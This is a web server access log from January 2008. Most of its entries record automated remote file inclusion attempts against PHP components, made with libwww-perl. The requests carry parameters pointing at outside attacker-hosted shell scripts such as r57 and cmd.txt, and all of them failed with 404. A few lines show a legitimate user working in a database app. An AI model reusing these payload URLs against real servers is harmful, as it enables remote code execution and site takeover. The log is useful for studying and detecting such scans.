193.205.186.244 - - [22/Jan/2008:12:46:30 -0800] "GET //skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:42 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:12:46:43 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:12:47:00 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:12:47:00 -0800] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:12:47:01 -0800] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:47:22 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:47:23 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.221.50 - - [22/Jan/2008:12:47:28 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.12 - - [22/Jan/2008:12:48:49 -0800] "GET /logs/access_071228.log//modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [22/Jan/2008:12:48:50 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [22/Jan/2008:12:48:50 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:12:49:07 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:12:49:07 -0800] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:12:49:07 -0800] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.176.141.31 - - [22/Jan/2008:12:49:38 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [22/Jan/2008:12:49:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [22/Jan/2008:12:49:39 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:12:51:18 -0800] "GET /logs/access_071229.log%20%20//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:52:05 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:52:07 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:52:09 -0800] "GET /logs/access.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:52:09 -0800] "GET //index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:52:10 -0800] "GET /logs//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:52:13 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.26.63.12 - - [22/Jan/2008:12:52:13 -0800] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:52:19 -0800] "GET /logs/access_071030.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.41.212.117 - - [22/Jan/2008:12:52:21 -0800] "GET /logs/access_071222.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:12:54:07 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.176.141.31 - - [22/Jan/2008:12:55:20 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:55:38 -0800] "GET /logs/access_071221.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:55:39 -0800] "GET //SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:12:55:39 -0800] "GET /logs//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.128.200.113 - - [22/Jan/2008:12:58:04 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:12:58:09 -0800] "GET /logs/access_071229.log//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:58:35 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:12:59:17 -0800] "GET /logs/access_071220.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - - [22/Jan/2008:13:01:41 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:02:42 -0800] "GET /logs/access_071203.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:02:43 -0800] "GET ///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:02:45 -0800] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - - [22/Jan/2008:13:03:45 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:48 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33136 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:48 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:48 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:49 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:49 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:49 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:03:52 -0800] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:13:04:21 -0800] "GET /logs/access.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:13:04:21 -0800] "GET /logs//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:04:33 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:04:38 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:04:44 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:05:54 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:05:55 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33138 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:05:57 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4843 HTTP/1.1" 200 7608 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:06:03 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=4843 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4843" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:06:03 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4843&just_updated=1 HTTP/1.1" 200 7527 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4843" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:06:05 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4843&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:06:07 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:13:06:08 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33136 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:13:06:58 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:13:06:58 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:13:06:58 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:01 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:03 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:05 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:13:08:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:13:08:12 -0800] "GET /logs/access.log/cyberfolio/portfolio/msg/view.php?av=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:14 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:14 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:08:21 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:13:12:05 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:13:13:09 -0800] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:13:13:10 -0800] "GET //index.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:13:13:10 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:13:13:30 -0800] "GET /logs/access_071229.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:14:01 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:13:15:23 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:15:38 -0800] "GET /logs/access.log/index.php?redir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:15:39 -0800] "GET /index.php?redir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:15:40 -0800] "GET /logs/index.php?redir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:17:12 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:17:14 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:17:14 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [22/Jan/2008:13:17:33 -0800] "GET /index.php?pageurl=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [22/Jan/2008:13:17:34 -0800] "GET /index.php?pageurl=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:13:17:43 -0800] "GET /logs/access_071224.log//SHELLZ.php//convert/mvcw.php?step=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:18:20 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:18:21 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:18:22 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.236 - - [22/Jan/2008:13:19:18 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
